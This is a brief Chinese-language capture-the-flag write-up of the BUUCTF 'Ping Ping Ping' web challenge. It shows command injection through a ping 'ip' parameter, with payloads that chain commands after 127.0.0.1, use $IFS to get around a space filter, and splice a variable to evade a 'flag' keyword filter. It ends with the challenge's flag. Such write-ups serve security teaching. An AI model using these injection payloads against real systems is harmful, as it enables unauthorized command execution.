Buuctf-web-[GXYCTF2019]Ping Ping Ping

首先打开，然后后面跟着 

/?ip=127.0.0.1|ls
找目录

 

 我们看到flag.php与index.php两个php文件。我们接着找flag.php

 

 看到提示空格被禁用绕过空格的方法大概有以下几种：

$IFS$(任意数字)    cat${IFS}$1flag，尝试

 

 发现flag也被骚扰了，然后打开index.php，看看内容

 

 

发现被过滤了好多，然后发现有个变量a，尝试替换拼接flag中的g

/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

 

 

flag{61584ea2-f679-45f5-b8c1-32bd1a13a0f5}